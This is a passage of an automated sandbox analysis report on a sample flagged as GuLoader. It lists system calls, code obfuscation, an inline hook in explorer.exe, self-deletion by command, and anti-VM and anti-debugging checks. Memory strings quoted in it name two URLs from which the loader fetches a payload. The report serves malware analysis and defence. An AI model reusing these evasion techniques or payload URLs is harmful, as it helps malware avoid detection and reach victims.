Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BA710 NtOpenProcessToken, 8_2_1E6BA710
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9FE0 NtCreateMutant, 8_2_1E6B9FE0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BA3B0 NtGetContextThread, 8_2_1E6BA3B0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BB040 NtSuspendThread, 8_2_1E6BB040
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9820 NtEnumerateKey, 8_2_1E6B9820
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B98A0 NtWriteVirtualMemory, 8_2_1E6B98A0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9560 NtWriteFile, 8_2_1E6B9560
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9950 NtQueueApcThread, 8_2_1E6B9950
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9520 NtWaitForSingleObject, 8_2_1E6B9520
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BAD30 NtSetContextThread, 8_2_1E6BAD30
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B95F0 NtQueryInformationFile, 8_2_1E6B95F0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B99D0 NtCreateProcessEx, 8_2_1E6B99D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B95D0 NtClose, 8_2_1E6B95D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_04FD9860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9840 NtDelayExecution,LdrInitializeThunk, 15_2_04FD9840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD95D0 NtClose,LdrInitializeThunk, 15_2_04FD95D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD99A0 NtCreateSection,LdrInitializeThunk, 15_2_04FD99A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9540 NtReadFile,LdrInitializeThunk, 15_2_04FD9540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_04FD9910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD96E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_04FD96E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD96D0 NtCreateKey,LdrInitializeThunk, 15_2_04FD96D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9660 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_04FD9660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A50 NtCreateFile,LdrInitializeThunk, 15_2_04FD9A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9650 NtQueryValueKey,LdrInitializeThunk, 15_2_04FD9650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9FE0 NtCreateMutant,LdrInitializeThunk, 15_2_04FD9FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9780 NtMapViewOfSection,LdrInitializeThunk, 15_2_04FD9780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9710 NtQueryInformationToken,LdrInitializeThunk, 15_2_04FD9710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD98F0 NtReadVirtualMemory, 15_2_04FD98F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD98A0 NtWriteVirtualMemory, 15_2_04FD98A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDB040 NtSuspendThread, 15_2_04FDB040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9820 NtEnumerateKey, 15_2_04FD9820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD95F0 NtQueryInformationFile, 15_2_04FD95F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD99D0 NtCreateProcessEx, 15_2_04FD99D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9560 NtWriteFile, 15_2_04FD9560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9950 NtQueueApcThread, 15_2_04FD9950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDAD30 NtSetContextThread, 15_2_04FDAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9520 NtWaitForSingleObject, 15_2_04FD9520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A80 NtOpenDirectoryObject, 15_2_04FD9A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9670 NtQueryInformationProcess, 15_2_04FD9670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A20 NtResumeThread, 15_2_04FD9A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9610 NtEnumerateValueKey, 15_2_04FD9610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A10 NtQuerySection, 15_2_04FD9A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9A00 NtProtectVirtualMemory, 15_2_04FD9A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDA3B0 NtGetContextThread, 15_2_04FDA3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD97A0 NtUnmapViewOfSection, 15_2_04FD97A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9770 NtSetInformationFile, 15_2_04FD9770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDA770 NtOpenThread, 15_2_04FDA770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9760 NtOpenProcess, 15_2_04FD9760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9730 NtQueryVirtualMemory, 15_2_04FD9730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FDA710 NtOpenProcessToken, 15_2_04FDA710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9B00 NtSetValueKey, 15_2_04FD9B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA350 NtCreateFile, 15_2_02EFA350
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA480 NtClose, 15_2_02EFA480
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA400 NtReadFile, 15_2_02EFA400
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA530 NtAllocateVirtualMemory, 15_2_02EFA530
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA3FA NtReadFile, 15_2_02EFA3FA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA3A2 NtReadFile, 15_2_02EFA3A2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA34A NtCreateFile, 15_2_02EFA34A
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\RYATPPETU.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RYATPPETU.exe
Source: RYATPPETU.exe, 00000008.00000002.613100559.0000000000119000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameCMMON32.exe` vs RYATPPETU.exe
Source: RYATPPETU.exe Virustotal: Detection: 31%
Source: RYATPPETU.exe ReversingLabs: Detection: 27%
Source: RYATPPETU.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RYATPPETU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Users\user\Desktop\RYATPPETU.exe Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RYATPPETU.exe Process created: C:\Users\user\Desktop\RYATPPETU.exe 'C:\Users\user\Desktop\RYATPPETU.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RYATPPETU.exe' Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe File created: C:\Users\user\AppData\Local\Temp\~DF4B4CC365E00E9684.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@3/2
Source: RYATPPETU.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_01
Source: C:\Users\user\Desktop\RYATPPETU.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: cmmon32.pdb source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp, cmmon32.exe, 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RYATPPETU.exe, cmmon32.exe

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00406E6E push edi; iretd 0_2_00406E74
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00403200 push 00401122h; ret 0_2_00403213
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00403214 push 00401122h; ret 0_2_00403227
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00403228 push 00401122h; ret 0_2_0040323B
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00402E34 push 00401122h; ret 0_2_004031C3
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00406537 push eax; iretd 0_2_004065A9
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_004031C4 push 00401122h; ret 0_2_004031D7
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_004031D8 push 00401122h; ret 0_2_004031EB
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_004031EC push 00401122h; ret 0_2_004031FF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_00405C9B push cs; iretd 0_2_00405CA1
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_0040659F push eax; iretd 0_2_004065A9
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B0A23 push ebp; ret 0_2_022B0A24
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B248F push ecx; retn F8CCh 0_2_022B25C8
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BD102 push ebx; ret 0_2_022BD106
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B6983 push esi; iretd 0_2_022B6984
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B3FEA push ds; ret 0_2_022B3FF2
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B4BF0 push es; retf 0_2_022B4C08
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6CD0D1 push ecx; ret 8_2_1E6CD0E4
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_00572BD6 push es; retn 003Ch 8_2_00572BEE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FED0D1 push ecx; ret 15_2_04FED0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EF7921 push eax; ret 15_2_02EF7932
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA6CE push ecx; iretd 15_2_02EFA6CF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFA7B8 push ebp; iretd 15_2_02EFA7B9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD4FB push eax; ret 15_2_02EFD562
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD4F2 push eax; ret 15_2_02EFD4F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD4A5 push eax; ret 15_2_02EFD4F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFCC98 push 00000048h; retf 15_2_02EFCC9A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFCC95 pushad ; ret 15_2_02EFCC96
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFC422 push edx; iretd 15_2_02EFC424
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EF5406 push es; ret 15_2_02EF540C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD55C push eax; ret 15_2_02EFD562

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: /c del 'C:\Users\user\Desktop\RYATPPETU.exe' Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\RYATPPETU.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://BLUMECONSTRUCTIONLLC.COM/BIN_NXOEAEAGUQ10.BINHTTPS://SOLEPROTECT.DE/BIN_NXOEAEAGUQ10.BIN
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\RYATPPETU.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RYATPPETU.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000002EE9904 second address: 0000000002EE990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000002EE9B6E second address: 0000000002EE9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6044 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A6A60 rdtscp 8_2_1E6A6A60
Source: C:\Users\user\Desktop\RYATPPETU.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe System information queried: ModuleInformation Jump to behavior
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 0000000C.00000000.573441250.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 0000000C.00000000.599818995.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 0000000C.00000000.598586193.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin
Source: explorer.exe, 0000000C.00000000.579374066.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000C.00000000.574488092.00000000053D7000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000C.00000000.579374066.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A6A60 rdtscp 8_2_1E6A6A60
Enables debug privileges
Source: C:\Users\user\Desktop\RYATPPETU.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BAC2C mov eax, dword ptr fs:[00000030h] 0_2_022BAC2C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C005C mov eax, dword ptr fs:[00000030h] 0_2_022C005C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BE1A6 mov eax, dword ptr fs:[00000030h] 0_2_022BE1A6
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BE9B4 mov eax, dword ptr fs:[00000030h] 0_2_022BE9B4
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68766D mov eax, dword ptr fs:[00000030h] 8_2_1E68766D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B927A mov eax, dword ptr fs:[00000030h] 8_2_1E6B927A
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E72B260 mov eax, dword ptr fs:[00000030h] 8_2_1E72B260
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E72B260 mov eax, dword ptr fs:[00000030h] 8_2_1E72B260
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h] 8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h] 8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h] 8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h] 8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67E620 mov eax, dword ptr fs:[00000030h] 8_2_1E67E620
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E72FE3F mov eax, dword ptr fs:[00000030h] 8_2_1E72FE3F
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h] 8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h] 8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h] 8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A16E0 mov ecx, dword ptr fs:[00000030h] 8_2_1E6A16E0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6876E2 mov eax, dword ptr fs:[00000030h] 8_2_1E6876E2
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E748ED6 mov eax, dword ptr fs:[00000030h] 8_2_1E748ED6
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6A36CC mov eax, dword ptr fs:[00000030h] 8_2_1E6A36CC
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E72FEC0 mov eax, dword ptr fs:[00000030h] 8_2_1E72FEC0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h] 8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6F46A7 mov eax, dword ptr fs:[00000030h] 8_2_1E6F46A7
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h] 8_2_1E740EA5
